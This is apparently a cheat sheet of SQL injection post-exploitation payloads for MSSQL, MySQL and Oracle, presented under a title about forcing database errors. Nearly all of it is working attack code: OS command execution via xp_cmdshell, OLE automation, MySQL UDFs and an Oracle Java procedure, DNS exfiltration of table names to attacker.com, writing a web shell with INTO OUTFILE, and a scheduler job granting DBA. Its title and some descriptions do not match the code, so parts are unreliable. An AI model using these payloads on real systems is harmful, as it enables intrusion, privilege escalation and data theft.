# Techniques to Force Errors from Databases for SQL Injection
### MSSQL
1. **OLE Automation Procedures**
```sql
DECLARE @Object INT;
EXEC sp_OACreate 'WScript.Shell', @Object OUTPUT;
EXEC sp_OAMethod @Object, 'Run', NULL, 'cmd.exe /c whoami > C:\output.txt';
```
This uses OLE Automation procedures to execute system commands.
2. **XP\_CMD Shell with Privilege Escalation**
```sql
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';
```
This enables `xp_cmdshell` to execute system commands if it's not already enabled.
3. **Linked Servers**
```sql
EXEC sp_addlinkedserver 'attacker_server';
EXEC sp_addlinkedsrvlogin 'attacker_server', 'false', NULL, 'username', 'password';
EXEC ('xp_cmdshell ''net user''') AT attacker_server;
```
This technique uses linked servers to run commands on a different server.
### MySQL
1. **UDF (User Defined Functions) for Remote Command Execution**
```sql
CREATE TABLE foo(line BLOB);
INSERT INTO foo VALUES (LOAD_FILE('/usr/lib/lib_mysqludf_sys.so'));
SELECT * FROM foo INTO DUMPFILE '/usr/lib/mysql/plugin/lib_mysqludf_sys.so';
CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys.so';
SELECT sys_exec('id > /tmp/out; chown mysql.mysql /tmp/out');
```
This technique involves creating a UDF to execute system commands.
2. **DNS Exfiltration**
```sql
SELECT LOAD_FILE(CONCAT('\\\\', (SELECT table_name FROM information_schema.tables LIMIT 0,1), '.attacker.com\\a'));
```
This exfiltrates data through DNS requests to an attacker-controlled domain.
3. **Binary Log Injections**
```sql
SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/lib/mysql/mysql.log';
SELECT '' INTO OUTFILE '/var/www/html/shell.php';
```
This exploits the binary log feature to write a web shell.
### Oracle
1. **Java Procedures for Command Execution**
EXEC dbms_java.grant_permission( 'SCOTT', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute' );
EXEC dbms_java.grant_permission( 'SCOTT', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '' );
EXEC dbms_java.grant_permission( 'SCOTT', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', '' );
CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "cmd" AS
import java.io.*;
public class cmd {
public static String run(String cmd) {
try {
StringBuffer output = new StringBuffer();
Process p = Runtime.getRuntime().exec(cmd);
BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line = "";
while ((line = reader.readLine())!= null) {
output.append(line + "\n");
}
return output.toString();
} catch (Exception e) {
return e.toString();
}
}
};
/
CREATE OR REPLACE FUNCTION run_cmd(p_cmd IN VARCHAR2) RETURN VARCHAR2
AS LANGUAGE JAVA
NAME 'cmd.run(java.lang.String) return java.lang.String';
/
SELECT run_cmd('id') FROM dual;
This uses Java stored procedures to execute system commands.
2. **UTL\_FILE Package for File Access**
```sql
DECLARE
l_file UTL_FILE.FILE_TYPE;
l_text VARCHAR2(32767);
BEGIN
l_file := UTL_FILE.FOPEN('DIRECTORY_NAME', 'output.txt', 'W');
UTL_FILE.PUT_LINE(l_file, 'Data from UTL_FILE');
UTL_FILE.FCLOSE(l_file);
END;
```
This technique uses the `UTL_FILE` package to write files to the server.
3. **DBMS\_SCHEDULER for Job Execution**
BEGIN
DBMS_SCHEDULER.create_job(
job_name => 'job1',
job_type => 'PLSQL_BLOCK',
job_action => 'BEGIN EXECUTE IMMEDIATE ''GRANT DBA TO SCOTT''; END;',
start_date => SYSTIMESTAMP,
repeat_interval => NULL,
end_date => NULL,
enabled => TRUE
);
END;
This uses `DBMS_SCHEDULER` to execute jobs that can change database permissions.